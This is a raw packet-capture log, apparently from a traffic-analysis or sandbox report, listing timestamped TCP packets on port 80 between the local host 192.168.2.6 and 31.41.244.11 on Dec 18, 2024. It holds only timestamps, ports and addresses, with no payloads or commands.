                                                                                                                                                                  Dec 18, 2024 11:09:27.616625071 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.616703033 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.617562056 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.617583036 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.617698908 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.617698908 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.618592978 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.618634939 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.618644953 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.618684053 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.619514942 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.619580030 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.619616032 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.619616032 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.620476961 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.620532990 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.620611906 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.620656013 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.760927916 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.761019945 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.761060953 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.761101007 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.761343956 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.761384964 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.761564016 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.761594057 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.761604071 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.761629105 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.762749910 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.762792110 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.762872934 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.762913942 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.763555050 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.763597965 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.763716936 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.763756990 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.764504910 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.764549971 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.764606953 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.764643908 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.765525103 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.765588999 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.765638113 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.765676022 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.766454935 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.766495943 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.766557932 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.766597033 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.767512083 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.767553091 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.767620087 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.767656088 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.768459082 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.768500090 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.768588066 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.768625975 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.769506931 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.769548893 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.769650936 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.769689083 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.770560980 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.770605087 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.770633936 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.770670891 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.771425009 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.771461964 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.771486998 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.771522999 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.772366047 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.772403002 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.772430897 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.772466898 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.773339987 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.773376942 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.773453951 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.773488998 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.774328947 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.774367094 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.774430037 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.774466991 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.775363922 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.775403976 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.775500059 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.775540113 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.776268005 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.776309013 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.776434898 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.776473045 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.777252913 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.777293921 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.777368069 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.777405024 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.778283119 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.778323889 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.778418064 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.778456926 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.779244900 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.779284954 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.779386044 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.779422998 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.780426025 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.780466080 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.780492067 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.780529022 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.781246901 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.781289101 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.781538963 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.781589985 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.782315016 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.782356024 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.782471895 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.782505989 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.783277988 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.783318996 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.783459902 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.783495903 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.784265995 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.784303904 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.784356117 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.784389019 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.785166025 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.785202026 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.785249949 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.785283089 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.786130905 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.786181927 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.786273956 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.786317110 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.787108898 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.787146091 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.787214994 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.787250042 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.788167000 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.788202047 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.788336039 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.788368940 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.789055109 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.789089918 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.789163113 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.789196968 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.790054083 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.790096045 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.790157080 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.790194035 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.791047096 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.791094065 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.791116953 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.791152954 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.792021036 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.792061090 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.792154074 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.792191029 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.792970896 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.793009043 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.793237925 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.793273926 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.793963909 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.793999910 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.794101000 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.794137001 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.795023918 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.795064926 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.795085907 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.795125008 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.795955896 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.796006918 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.796083927 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.796120882 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.797019005 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.797058105 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.797168016 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.797204971 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.797904015 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.797950983 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.797987938 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.798026085 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.798933983 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.798979044 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.799062014 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.799117088 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.799969912 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.800010920 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.800046921 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.800084114 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.800846100 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.800894022 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.800926924 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.800972939 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.801841021 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.801884890 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.801970005 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.802011013 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.802849054 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.802895069 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.802937031 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.802973986 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.803808928 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.803867102 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.803908110 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.803950071 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.804780006 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.804830074 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.804917097 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.804959059 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.805747986 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.805804014 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.805843115 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.805888891 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.806725025 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.806778908 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.806834936 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.806876898 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.807737112 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.807779074 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.807818890 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.807858944 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.808700085 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.808744907 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.808779955 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.808821917 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.809655905 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.809701920 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.809732914 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.809775114 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.810662031 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.810708046 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.810751915 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.810792923 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.811635017 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.811681032 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.811713934 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.811755896 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.952943087 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.952963114 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.953068972 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.953130960 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.953176975 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.953226089 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.953269005 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.953996897 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.954040051 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.954102993 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.954142094 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.955018997 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.955080986 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.955113888 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.955154896 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.956026077 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.956104994 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.956105947 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.956145048 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.956928015 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.956989050 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.957065105 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.957112074 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.957922935 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.957973957 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.958033085 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.958072901 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.958883047 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.958934069 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.958995104 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.959036112 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.959901094 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.959943056 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.959952116 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.959990025 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.960900068 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.960941076 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.961199045 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.961240053 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.961878061 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.961921930 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.961961031 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.961997986 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.963044882 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.963088036 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.963098049 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.963135004 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.964036942 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.964082003 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.964176893 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.964215994 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.965125084 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.965169907 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.965212107 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.965250969 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.966160059 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.966203928 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.966253996 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.966289043 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.967293024 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.967341900 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.967416048 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.967459917 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.969001055 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.969042063 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.969043016 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.969082117 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.969547987 CET804991231.41.244.11192.168.2.6
